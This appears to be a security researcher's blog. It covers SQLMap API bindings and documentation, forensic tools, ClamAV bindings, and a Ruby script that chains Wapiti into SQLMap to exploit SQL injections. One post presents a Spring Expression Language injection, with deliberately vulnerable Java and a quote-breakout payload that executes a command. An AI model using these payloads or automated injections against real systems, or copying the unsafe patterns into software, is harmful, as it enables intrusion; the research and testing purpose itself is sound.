Volatile Minds

Vulnerable SOAP endpoint and related fuzzer on github

2013-05-22T21:16:00.000-06:00

I have written a small SOAP endpoint in C# and a corresponding fuzzer that parses the WSDL of the vulnerable endpoint and attempts to find SQL injections. It then passes vulnerable URL's it finds to SQLMap via the RESTful SQLMap API. You can get the source here:

https://github.com/brandonprry/vulnerable_soap_service

Interacting with SQLMap from C#

2013-04-13T15:42:00.000-06:00

I just checked in some basic bindings to the SQLMap RESTful API. Pretty simple, below is an example application. It creates a new task, sets the msfPath option (but stores a copy of the options from before), starts the task using a specific URL set in the options dictionary, watches the scan until it completes, then writes the logs messages to stdout. You can get the bindings on github.

using System;
using sqlmapsharp;
using System.Collections.Generic;

namespace Example
{
 class MainClass
 {
  public static void Main (string[] args)
  {
   using (SqlmapSession session = new SqlmapSession("127.0.0.1", 8775))
   {
    using (SqlmapManager manager = new SqlmapManager(session))
    {
     string taskid = manager.NewTask();

     Console.WriteLine(taskid);

     Dictionary options = manager.GetOptions(taskid);

     manager.SetOption(taskid, "msfPath", "/path/to/msf");

     Dictionary newoptions = manager.GetOptions(taskid);

     Console.WriteLine("Old msfpath: " + options["msfPath"].ToString());
     Console.WriteLine("New msfpath: " + newoptions["msfPath"].ToString());

     options["url"] = "http://192.168.1.254/xslt?PAGE=C_0_0";

     manager.StartTask(taskid, options);

     SqlmapStatus status = manager.GetScanStatus(taskid);

     while (status.Status != "terminated")
     {
      System.Threading.Thread.Sleep(new TimeSpan(0,0,10));
      status = manager.GetScanStatus(taskid);
     }

     List logItems = manager.GetLog(taskid);

     foreach (SqlmapLogItem item in logItems)
      Console.WriteLine(item.Message);

     manager.DeleteTask(taskid);
    }
   }
  }
 }
}

Unofficial SQLmap RESTful API documentation

2013-04-13T13:25:00.001-06:00

This isn't comprehensive, just the most useful methods. I haven't found any docs on the API yet but wanted to play with it. :)

The full list of methods available are:

@get("/task/new")
@get("/task/<taskid>/delete")
@get("/admin/<taskid>/list")
@get("/admin/<taskid>/flush")
@get("/option/<taskid>/list")
@post("/option/<taskid>/get")
@post("/option/<taskid>/set")
@post("/scan/<taskid>/start")
@get("/scan/<taskid>/stop")
@get("/scan/<taskid>/kill")
@get("/scan/<taskid>/status")
@get("/scan/<taskid>/data")
@get("/scan/<taskid>/log/<start>/<end>")
@get("/scan/<taskid>/log")
@get("/download/<taskid>/<target>/<filename:path>")

These are the methods I have been using
GET /task/new
Response:

{
    "taskid": "1d47d7f046df1504"
}

GET /task/<task_id>/delete
Response:

{
    "success": true
}

GET /option/<task_id>/list Response:

{
    "options": {
        "crawlDepth": null, 
        "osShell": false, 
        "getUsers": false, 
        "getPasswordHashes": false, 
        "excludeSysDbs": false, 
        "uChar": null, 
        "regData": null, 
        "cpuThrottle": 5, 
        "prefix": null, 
        "code": null, 
        "googlePage": 1, 
        "query": null, 
        "randomAgent": false, 
        "delay": 0, 
        "isDba": false, 
        "requestFile": null, 
        "predictOutput": false, 
        "wizard": false, 
        "stopFail": false, 
        "forms": false, 
        "taskid": "73674cc5eace4ac7", 
        "skip": null, 
        "dropSetCookie": false, 
        "smart": false, 
        "risk": 1, 
        "sqlFile": null, 
        "rParam": null, 
        "getCurrentUser": false, 
        "notString": null, 
        "getRoles": false, 
        "getPrivileges": false, 
        "testParameter": null, 
        "tbl": null, 
        "charset": null, 
        "trafficFile": null, 
        "osSmb": false, 
        "level": 1, 
        "secondOrder": null, 
        "pCred": null, 
        "timeout": 30, 
        "firstChar": null, 
        "updateAll": false, 
        "binaryFields": false, 
        "checkTor": false, 
        "aType": null, 
        "direct": null, 
        "saFreq": 0, 
        "tmpPath": null, 
        "titles": false, 
        "getSchema": false, 
        "identifyWaf": false, 
        "checkWaf": false, 
        "regKey": null, 
        "limitStart": null, 
        "loadCookies": null, 
        "dnsName": null, 
        "csvDel": ",", 
        "oDir": null, 
        "osBof": false, 
        "invalidLogical": false, 
        "getCurrentDb": false, 
        "hexConvert": false, 
        "answers": null, 
        "host": null, 
        "dependencies": false, 
        "cookie": null, 
        "proxy": null, 
        "regType": null, 
        "optimize": false, 
        "limitStop": null, 
        "mnemonics": null, 
        "uFrom": null, 
        "noCast": false, 
        "testFilter": null, 
        "eta": false, 
        "threads": 1, 
        "logFile": null, 
        "os": null, 
        "col": null, 
        "rFile": null, 
        "verbose": 1, 
        "aCert": null, 
        "torPort": null, 
        "privEsc": false, 
        "forceDns": false, 
        "getAll": false, 
        "api": true, 
        "url": null, 
        "invalidBignum": false, 
        "regexp": null, 
        "getDbs": false, 
        "freshQueries": false, 
        "uCols": null, 
        "smokeTest": false, 
        "pDel": null, 
        "wFile": null, 
        "udfInject": false, 
        "tor": false, 
        "forceSSL": false, 
        "beep": false, 
        "saveCmdline": false, 
        "configFile": null, 
        "scope": null, 
        "dumpAll": false, 
        "torType": "HTTP", 
        "regVal": null, 
        "dummy": false, 
        "commonTables": false, 
        "search": false, 
        "skipUrlEncode": false, 
        "referer": null, 
        "liveTest": false, 
        "purgeOutput": false, 
        "retries": 3, 
        "extensiveFp": false, 
        "dumpTable": false, 
        "database": "/tmp/sqlmapipc-EmjjlQ", 
        "batch": true, 
        "headers": null, 
        "flushSession": false, 
        "osCmd": null, 
        "suffix": null, 
        "dbmsCred": null, 
        "regDel": false, 
        "shLib": null, 
        "nullConnection": false, 
        "timeSec": 5, 
        "msfPath": null, 
        "noEscape": false, 
        "getHostname": false, 
        "sessionFile": null, 
        "disableColoring": true, 
        "getTables": false, 
        "agent": null, 
        "lastChar": null, 
        "string": null, 
        "dbms": null, 
        "tamper": null, 
        "hpp": false, 
        "runCase": null, 
        "osPwn": false, 
        "evalCode": null, 
        "cleanup": false, 
        "getBanner": false, 
        "profile": false, 
        "regRead": false, 
        "bulkFile": null, 
        "safUrl": null, 
        "db": null, 
        "dumpFormat": "CSV", 
        "alert": null, 
        "user": null, 
        "parseErrors": false, 
        "aCred": null, 
        "getCount": false, 
        "dFile": null, 
        "data": null, 
        "regAdd": false, 
        "ignoreProxy": false, 
        "getColumns": false, 
        "mobile": false, 
        "googleDork": null, 
        "sqlShell": false, 
        "pageRank": false, 
        "tech": "BEUSTQ", 
        "textOnly": false, 
        "commonColumns": false, 
        "keepAlive": false
    }
}

POST /option/<task_id>/set -- Content-Type:application/json
Request:

{ "msfPath" : "/path/to/metasploit/framework" }

Response:

{
    "success": true
}

POST /scan/<task_id>/start -- Content-Type:application/json
Request (optional):

{ "url" : "192.168.1.250/index.php?wut=injectable" }

Response:

{
    "engineid": 16784, 
    "success": true
}

GET /scan/<task_id>/log
Response:

{
    "log": [
        {
            "message": "testing connection to the target URL", 
            "level": "INFO", 
            "time": "14:11:23"
        }, 
        {
            "message": "testing if the target URL is stable. This can take a couple of seconds", 
            "level": "INFO", 
            "time": "14:11:24"
        }, 
        {
            "message": "target URL is stable", 
            "level": "INFO", 
            "time": "14:11:26"
        }, 
        {
            "message": "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')", 
            "level": "CRITICAL", 
            "time": "14:11:26"
        }, 
        {
            "message": "testing connection to the target URL", 
            "level": "INFO", 
            "time": "14:17:30"
        }, 
        {
            "message": "testing if the target URL is stable. This can take a couple of seconds", 
            "level": "INFO", 
            "time": "14:17:31"
        }, 
        {
            "message": "target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "testing if GET parameter 'PAGE' is dynamic", 
            "level": "INFO", 
            "time": "14:17:33"
        }, 
        {
            "message": "confirming that GET parameter 'PAGE' is dynamic", 
            "level": "INFO", 
            "time": "14:17:33"
        }, 
        {
            "message": "GET parameter 'PAGE' does not appear dynamic", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "reflective value(s) found and filtering out", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "heuristic (basic) test shows that GET parameter 'PAGE' might not be injectable", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "testing for SQL injection on GET parameter 'PAGE'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'PostgreSQL AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'MySQL inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'PostgreSQL inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'Oracle inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'SQLite inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'PostgreSQL > 8.1 stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'PostgreSQL > 8.1 AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Oracle AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'MySQL UNION query (NULL) - 1 to 10 columns'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 10 columns'", 
            "level": "INFO", 
            "time": "14:17:38"
        }, 
        {
            "message": "using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'", 
            "level": "WARNING", 
            "time": "14:17:38"
        }, 
        {
            "message": "GET parameter 'PAGE' is not injectable", 
            "level": "WARNING", 
            "time": "14:17:39"
        }, 
        {
            "message": "all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')", 
            "level": "CRITICAL", 
            "time": "14:17:40"
        }, 
        {
            "message": "HTTP error codes detected during run:\n404 (Not Found) - 183 times", 
            "level": "WARNING", 
            "time": "14:17:40"
        }
    ]
}

GET /scan/<task_id>/status
Response:

{
    "status": "terminated", 
    "returncode": 0
}

Corelan Training

2013-02-15T18:08:00.000-06:00

This week, I took the Corelan Exploit Development Training. It was a two day training, on Tuesday and Wednesday, and very fun. I will admit, it is not for the weak of heart. Tuesday, we started at 9am, and I ended up leaving around 11pm, and other guys stayed even later. Wednesday, we started at 9am again and went until around 8pm.

During the first day, we discussed classic buffer overflows resulting is pointer overwrites and the like, and how to exploit them using Immunity Debugger and mona.py. Luckily, I already had experience with most of the materials for the first day through personal experience, and was able to help out other guys taking the class with using mona and how the buffer overflows worked.

During the second day, we discussed DEP, ASLR, and ROP chains. I do not have much experience with these, so the learning curve was higher, although I did understand the fundamentals of how these worked. We also discussed heap sprays, which was great as well. Heap sprays had been on my todo-list for quite a while and are incredibly interesting to me.

Peter is a great teacher and understands the materials well enough to answer tangential questions that aren't really covered in the materials. He understands his students very well, so he is able to relate information in meaningful ways, which is infinitely more helpful than just presenting information and expecting the students to remember by simple rote memory. It also helps that he presents materials that he wrote himself, rather than simply using someone else's work.

Overall, I highly recommend the class if you have the means. In order to really get the most out of the class, you should absolutely have a basic understanding of assembly and how stacks and heaps work. You can read up on these on the corelan website.

First Ubuntu apps published

2013-01-17T19:09:00.001-06:00

Check out the VolatileMinds Registry Reader or the VolatileMinds Pagefile Analyzer in the Ubuntu app store.

The registry reader is a GTK/Mono application that allows the user to read offline hives with an easy to use UI.

The pagefile analyzer is a GTK/mono application that allows the user to analyze a pagefile.sys from a computer, and search for email addresses, filepaths, environment variables, and more.

Controlling cuckoo-sandbox from C#

2012-12-30T18:52:00.001-06:00

After testing some metasploit modules today, I decided writing some bindings for cuckoo-sandbox would be fun. I have been writing a small project that my clamav bindings to watch high risk areas and scan them on the fly. A fun, new addition would be to automagically submit anything found by clamav straight to cuckoo-sandbox and get the report back.

The code is on github and there is a small example application. Not every method is implemented fully, but it is still fun to play with. I did have to use a third party library for JSON parsing because of a bug in Mono's JavaScriptSerializer.

There is also an example program.

Added environment variable recovery from pagefiles to volatile reader

2012-12-23T20:02:00.003-06:00

I added string search support to page files inside volatile reader, and used that as an opportunity to add environment variable recovery as well. The following pagefile was taken from a 64-bit windows 7 VM and was 4.3 GB. The code is in github.

evtx support pretty much added

2012-11-04T16:34:00.000-06:00

Evtx format was a real PITA. Took me way longer than I expected to write the code to parse the offline logs. Not being shown in the UI yet, but I checked in support for reading offline evtx files today. Will only print out the parsed data to the console atm.

https://github.com/brandonprry/volatile_reader

volatile_reader reads legacy evt files

2012-10-29T21:19:00.004-06:00

volatile_reader now reads legacy XP evt files. evtx up next!

Introducing volatile_reader

2012-10-28T18:38:00.003-06:00

Today I decided I was going to write a small offline registry reader in C# using GTK for the UI. I actually intend on adding both evt and evtx support as well, but these will come later.

In order to read the hives, I wrote a small library included with the utility called VolatileReader.Registry. It is super fast and efficient, it uses a BinaryReader to zip around and read the hive rather than reading the hive into memory, then parsing it. All you must do is pass the contructor of RegistryHive the path to your hive:

RegistryHive hive = new RegistryHive(file);

You can check out the code here: https://github.com/brandonprry/volatile_reader

Introducing rising_sun

2012-10-21T11:20:00.000-06:00

I have recently open-sourced a personal project of mine that I have used as an automated security test bed of a sort. Using bindings I have written for popular pieces of software, I have written a small framework for automating these tools and passing their relevant data from one tool to the next. A general architecture overview is required. Most of the tools are free and open source.

The framework has three main parts. An API (needs a lot of work), a Web UI (kind of OK), and a Service (solid, small, runs and manages the Profiles and Scans). It is written in C# and ASP.NET, so it is cross platform (I develop on Linux using monodevelop). Most tools are in scripting languages too or are also cross-platform. Using PGSql as the DB backend and FluentNHibernate for persistence. In order to automate OpenVAS, Nexpose, Nessus, and Metasploit, I am using my openvas-sharp, nexpose-sharp, nessus-sharp, and metasploit-sharp bindings.

When you create a profile via the Web UI, the scan of the profile takes place in two parts, breadth and depth. First, the service gathers as much surface area of the host as possible. This is called the Profile phase. Once the host has been profiled and it's attack surface area figured out, we move onto the Scan phase, where we actively attempt to find vulns using the surface area we determined in the previous phase.

Current tools automated during the Profile phase are Nmap (in a few incarnations), Nikto, sslscan, onesixtyone, smbclient, and a few others off the top of my head, with more web fingerprinting and other tools in the pipeline (MBSA is one). smbclient will loop through each share it can find and attempt to log in anonymously (unless creds are provided) and attempt an "ls;recurse" which tells smbclient to list all files on the share. This phase can be considered mostly passive and can be run on it own with no Scan attached.

Current tools automated during the Scan phase are OpenVAS, Nexpose, Nessus, Metasploit/Pro, Wapiti, DSXS, and SQLMap. This phase is by far the most important and integrative. We use all the data collected in the previous profile to decide what to scan. By using as many vuln scanners like OpenVAS, Nexpose, and Nessus as possible, you can find far better results in terms of deducing false positives and false negatives (2 out of 3 report this, 33% chance false positive. 1 out of 3 report that, 66% chance false positive). This phase is laid out like a pyramid, with Metasploit on top. Before Wapiti and SQLMap are run, your vuln assessment scans are kicked off. As these run, we fuzz any known web services running that we know about with Wapiti (not just port 80 and 443, anything NMap decided was http). We take this XML report it creates (must run trunk) and parse it and figure out exactly what wapiti found and pass on the relevant details to SQLMap and DSXS to figure out exactly how to exploit any SQL injection or XSS vulnerabilities. I use some novel methods to ensure SQLMap only tests what Wapiti was found to find vulnerable, so it is pretty quick, and can be made quicker with a few tweaks. This requires a Profile to have been run.

In the end, the data from wapiti, openvas, nessus, and nexpose are fed into metasploit via sshfs mountint the remote /tmp locally. Then a metasploit pro discovery is done, then a quick bruteforce, then an exploit task is started using all the data from the previous scans. Once this is done, the scan phase is over and persisted and your results will be in the web UI.

Not all tools are required, if you don't have access to Metasploit Pro, you can simply choose to not run it. The same goes for OpenVAS, Nexpose, and Nessus. It is granular to that point. You may also choose to not run the web assessment, and only run the general vuln assessment(s).

Most of the data collected is presented in the UI in some form or fashion, but not all of it is. Installation isn't straight forward so please read the README.

Generally I run against: a vulnerable FreeNAS distro, Metasploitable2 with TWiki removed, BadStore, and a vulnerable Windows XP SP2 machine.

Please hit me up on IRC (bperry on Freenode, idle in #metasploit) if you have trouble setting up (you probably will, but I hope you don't!).

Integrating ClamAV into your C# applications

2012-10-12T23:48:00.002-06:00

During the VP debate, I decided to write some ClamAV bindings for C# that were up to date. The current C# lib for libclamav that is linked on the ClamAV website is from 2005 and no longer useful. Here is a small introduction.

The main objects you will probably work with as a programmer is probably the ClamEngine and ClamResult objects. Since we are interfacing with a library written in C, we must take into account memory leaks. The ClamEngine implements IDisposable and is intended to be used in the context of a using statement. If you are using .NET 1.1 and do not have the using statement available, you will need to call Dispose() explicitly. Here is an example application:

using System;
using clamsharp;

namespace testing
{
   class MainClass
   {
 public static void Main (string[] args)
 {
  using (ClamEngine e = new ClamEngine())
  {
   foreach (string file in args)
   {
    ClamResult result = e.ScanFile(file); //pretty simple!
     
    if (result != null && result.ReturnCode == ClamReturnCode.CL_VIRUS)
     Console.WriteLine("Found: " + result.VirusName);
    else
     Console.WriteLine("File Clean!");
   }
  } //engine is disposed of here and the allocated engine freed
 }
   }
}

One note: If you want it to build on Windows, you will need to change the DllImport's to point to where ever on Windows you need to point to in ClamBindings.

clamd TCP bindings are probably on their way soon, it will be easy enough. The main code is thoroughly documented, but if you still have question after that, feel free to ask on Github.

If you would like to test this without a real virus, I recommend using EICAR.

Theoretical vulnerabilities using the Spring Expression Language

2012-09-12T19:28:00.001-06:00

The past two days, I have been taking Core Spring training (work paid for it, why not). Our instructor ended up bringing up the Spring Expression Language (or SpEL), and showed us how it could be used to parse values and various other things.

While playing around with it, I was curious if I could evaluate java code at runtime that could execute calc.exe and after a few minutes of tinkering, I was able to execute calc.exe via the Spring Expression Language. It was easy enough:

ExpressionParser p = new SpelExpressionParser(); 
Expression e = p.parseExpression("T(Runtime).getRuntime().exec('calc.exe')"); //set expression to eval 
e.getValue(); //eval

Once I had this bit figured out, I realised the potential for Remote Command Execution via the expression language. The way to get a program using the Spring Expression Language to evaluate unintended code is very similar to the way a SQL injection works, but there are some catches and nuances, and I will go over them here. This whole post is theoretical only, as I have never actually come across this vulnerability before. However, it would be easy for a programmer not completely familiar with how the expression language works to write vulnerable code that allowed remote code execution.

For instance, take the following code:

import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.util.Assert;
import org.apache.commons.logging.LogFactory; 
import java.io.*;
import java.util.Date;

public class main {

 /**
  * @param args
  * @throws Exception 
  */
 public static void main(String[] args) throws Exception {
  // TODO Auto-generated method stub
  ExpressionParser parser = new SpelExpressionParser();

  System.out.println("Please enter a date and I will parse it:");
  java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
         String line = stdin.readLine();
  Expression exp = parser.parseExpression(line);  
  Date date = (Date)exp.getValue();

  System.out.println(date.toString());
 }
}

The vulnerability is obvious, the program does no checking whatsoever to ensure the user isn't inputing something they shouldn't. Simply typing:

T(Runtime).getRuntime().exec('calc.exe')

would execute calc.exe, then error out since the string you passed in is obviously not a Date.

Let's take the vulnerability a step further though. Let's modify the above code slightly.

Turn the following:

Expression exp = parser.parseExpression(line);

into:

Expression exp = parser.parseExpression("'" + line + "'");

This code change technically fixes a bug in our code. In the previous code, if the user entered a Date that was not surrounded by single-quotes, then the application would error out. By adding the single-quotes in our code, the user can enter the Date value without the single-quotes. This also makes it a bit more difficult to exploit, however not impossible. In order to exploit this new code, we can think about this vulnerability as if it were a SQL injection vulnerability, with a few catches.

We need to make a semantically-correct string that will be eval'ed that will "break out" of the current quotes that we have added to the codebase. To do this, we can use some of the operators at our disposal that the Spring Expression Language has.

My first attempt to exploit the new code was to use the 'and' operator. This was fruitless since Java is a strongly-typed language and Java was trying to evaluate the strings as boolean values, which did not work. After a few more minutes, I figured out how to break out of the quotes and have Spring evaluate and execute my payload:

02/12/2012' == T(Runtime).getRuntime().exec('calc.exe').toString() + '

The resulting string that gets eval'ed is this:

'02/12/2012' == T(Runtime).getRuntime().exec('calc.exe').toString() + ''

Basically, I am asking Spring to evaluate whether the string to the left of my == operator is the same as my payload, which must be evaluated and executed before the comparison can happen. calc.exe gets executed and now I am happy.

You may find the full code examples here and here.

Security on the AWS cloud

2012-08-05T14:30:00.000-06:00

I have been working with EC2 in my free time (what's that?) and realised some bad information had been spread about how to get your instances to talk with one another. By default, the instances do not respond to pings or nmap's from other machines due to very restrictive firewall settings. This is a good thing. The bad thing was that I was reading on forums that setting your All ICMP, All UDP, and All TCP firewall settings to 0.0.0.0/0 was the easiest fix. While this is true, it is the easiest fix, it isn't very secure. I was able to nmap a small subnet inside the EC2 cloud (internal network, not external) and found 30 machines responding. When you put 0.0.0.0/0, you let everyone inside that network ping, port scan, and connect to your computer. By being more granular, and setting your firewall rules to the specific instances that you want talking (111.222.122.123/32), you are protecting your machine from threats inside this cloud network. Setting your All ICMP, All UDP, and All TCP to 0.0.0.0/0 is just opening yourself up needelessly for an attack. It may take you an extra 5 minutes to create a rule for each host you want communicating.

Performing forensics on RAMDisk based operating system via QEMU

2012-07-16T22:55:00.001-06:00

I came across a problem requiring me to get to a filesystem resident in RAM via a RAMDisk. I used QEMU to dump this to a file for further analysis.

The system at hand was disk encryption software that performs some disk trickery in order to unlock the drive after supplying credentials to the disk encryption software. The disk encryption software was Linux based. However, the RAMDisk was being initiated by MSDOS startup files. It was a very weird setup.

I was able to use QEMU and an Ubuntu Live USB disk to dump what I needed. Because the disk encryption was resident on the HDD instead of the BIOS, I was able to boot to my Live USB and circumvent the HDD entirely. Once in the Live System, I installed qemu and ghex.

Using

qemu-system-i386 -hda /dev/sda -monitor stdio

I was able to boot the hard disk into a virtualised environment. -monitor stdio gives me a qemu shell prompt in the bash shell that I started the QEMU instance in. This is how we will be saving the full state of the VM. Once booted into the disk encryption software, I ran the following to see what devices I had at my disposal

(qemu) info block
ide0-hd0: removable=0 io-status=ok file=/dev/sda ro=0 drv=raw encrypted=0
ide1-cd0: removable=1 locked=0 tray-open=0 io-status=ok [not inserted]
floppy0: removable=1 locked=0 tray-open=0 [not inserted]
sd0: removable=1 locked=0 tray-open=0 [not inserted]
(qemu)

Now that I have the disks, the hd0 block is what I want. We want to create a new file to save our vm into.

snapshot_blkdev ide0-hd0 dump

Now save the vm's state into the dump file

savevm

You may now use further, more advanced techniques to analyse the contents of the RAM disk by using a hex editor or various other tools to extract the wanted data from the saved state of the vm.

Automating SQLMap with data from wapiti

2012-05-20T16:43:00.004-06:00

Wapiti is really fast at finding possible sql injection points in a web application or website. SQLMap is great at figuring out how to exploit these possible injection points. The following script runs Wapiti on a host to find possible injection points, then passes that data to SQLMap to try and exploit. Tested on BadStore and running SVN latest of both Wapiti and SQLMap. You can play around with the arguments I am passing to SQLMap and make the scans a bit more thorough, but at the expense of speed.

#!/usr/bin/env ruby
 
require 'active_support/secure_random'
require 'rexml/document'
 
wapiti_path = '/home/bperry/tools/wapiti/trunk/src/'
sqlmap_path = '/home/bperry/tools/sqlmap/'
 
wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'
 
remote_host = ARGV[0]
 
p "Running wapiti..."
`#{wapiti_path}wapiti.py #{ARGV[0]} -f xml -o #{wapiti_report_path}`
 
p "Report saved to #{wapiti_report_path}"
 
p "Parsing results"
 
results = []
 
report = ::File.open(wapiti_report_path, "rb")
doc = REXML::Document.new report.read
 
doc.elements.each('/report/bugTypeList/bugType') do |element|
        bug_type = element.attributes["name"]
 
        next if bug_type != "SQL Injection"
 
        p "Parsing " + bug_type
 
        result = {}
        element.elements.each("bugList/bug") do |bug|
                result[:type] = bug_type
               
                bug.elements.each do |child|
                        if child.name == "url"
                                result[:url] = child.text
                        elsif child.name == "parameter"
                                result[:parameter] = child.text
                        end
                end
                results << result
                result = {}
        end
end
 
results.each do |result|
        next if result[:type] !~ /SQL Injection/
        p "Running sqlmap"
       
        if result[:url].index(result[:parameter])
                url = result[:url].gsub("%BF%27%22%28", "abcd")
       
                params = result[:url].split("?")[1].split("&")
 
                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end
                       
                p "Running GET sql injection test on url: " + url
                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --smart --skip=\"#{skipped_params.join(",")}\" --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                out = `#{sqlmap_command}`
                printf out
        else
                url = result[:url]
                p "Running POST sql injection test on url: " + url
                p "With data: " + result[:parameter]
 
                parameter = result[:parameter].gsub("%BF%27%22%28", "abcd")
 
                params = result[:parameter].split("&")
 
                skipped_params = []
                params.each do |param|
                        skipped_params << param.split("=")[0] if not param.index("%BF%27%22%28")
                end
 
                sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --data=\"#{parameter}\"  --skip=\"#{skipped_params.join(",")}\" --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
                p sqlmap_command
                sqlmap_output = `#{sqlmap_command}`
               
                printf sqlmap_output
        end
end

Simple CVE stats from 2001-2011

2012-05-07T20:15:00.002-06:00

Year 2001 has 1538 vulnerabilities
2001 had 8 vulns of type:  Buffer Errors
2001 had 4 vulns of type:  Cryptographic Issues
2001 had 4 vulns of type:  Path Traversal
2001 had 2 vulns of type:  Authentication Issues
2001 had 2 vulns of type:  Permissions, Privileges, and Access Control
2001 had 2 vulns of type:  Code Injection
2001 had 2 vulns of type:  Input Validation
2001 had 1 vulns of type:  Resource Management Errors
2001 had 1 vulns of type:  Link Following
2001 had 0 vulns of type:  Credentials Management
2001 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2001 had 0 vulns of type:  Cross-Site Scripting
2001 had 0 vulns of type:  Format String Vulnerability
2001 had 0 vulns of type:  Configuration
2001 had 0 vulns of type:  Information Leak / Disclosure
2001 had 0 vulns of type:  Numeric Errors
2001 had 0 vulns of type:  OS Command Injections
2001 had 0 vulns of type:  Race Conditions
2001 had 0 vulns of type:  SQL Injection
Total vulns in 2001 with CWE: 26
Percentage of vulns with CWE: 1.69050715214564%


Year 2002 has 2368 vulnerabilities
2002 had 41 vulns of type:  Buffer Errors
2002 had 32 vulns of type:  Permissions, Privileges, and Access Control
2002 had 32 vulns of type:  Cross-Site Scripting
2002 had 29 vulns of type:  Input Validation
2002 had 17 vulns of type:  Information Leak / Disclosure
2002 had 13 vulns of type:  Path Traversal
2002 had 9 vulns of type:  Configuration
2002 had 8 vulns of type:  Credentials Management
2002 had 8 vulns of type:  Code Injection
2002 had 7 vulns of type:  SQL Injection
2002 had 6 vulns of type:  Numeric Errors
2002 had 6 vulns of type:  Resource Management Errors
2002 had 5 vulns of type:  Authentication Issues
2002 had 3 vulns of type:  Cryptographic Issues
2002 had 2 vulns of type:  Race Conditions
2002 had 2 vulns of type:  Link Following
2002 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2002 had 1 vulns of type:  Format String Vulnerability
2002 had 1 vulns of type:  OS Command Injections
Total vulns in 2002 with CWE: 223
Percentage of vulns with CWE: 9.41722972972973%


Year 2003 has 1515 vulnerabilities
2003 had 59 vulns of type:  Buffer Errors
2003 had 40 vulns of type:  Cross-Site Scripting
2003 had 30 vulns of type:  Input Validation
2003 had 25 vulns of type:  Information Leak / Disclosure
2003 had 24 vulns of type:  Permissions, Privileges, and Access Control
2003 had 17 vulns of type:  Path Traversal
2003 had 13 vulns of type:  Code Injection
2003 had 12 vulns of type:  Configuration
2003 had 12 vulns of type:  SQL Injection
2003 had 9 vulns of type:  Authentication Issues
2003 had 9 vulns of type:  Credentials Management
2003 had 8 vulns of type:  Cryptographic Issues
2003 had 6 vulns of type:  Resource Management Errors
2003 had 4 vulns of type:  Numeric Errors
2003 had 2 vulns of type:  Format String Vulnerability
2003 had 2 vulns of type:  Race Conditions
2003 had 2 vulns of type:  Link Following
2003 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2003 had 0 vulns of type:  OS Command Injections
Total vulns in 2003 with CWE: 274
Percentage of vulns with CWE: 18.0858085808581%


Year 2004 has 2669 vulnerabilities
2004 had 30 vulns of type:  Buffer Errors
2004 had 22 vulns of type:  Permissions, Privileges, and Access Control
2004 had 20 vulns of type:  Cross-Site Scripting
2004 had 9 vulns of type:  Path Traversal
2004 had 9 vulns of type:  Input Validation
2004 had 8 vulns of type:  SQL Injection
2004 had 6 vulns of type:  Authentication Issues
2004 had 6 vulns of type:  Credentials Management
2004 had 6 vulns of type:  Code Injection
2004 had 5 vulns of type:  Configuration
2004 had 4 vulns of type:  Information Leak / Disclosure
2004 had 4 vulns of type:  Resource Management Errors
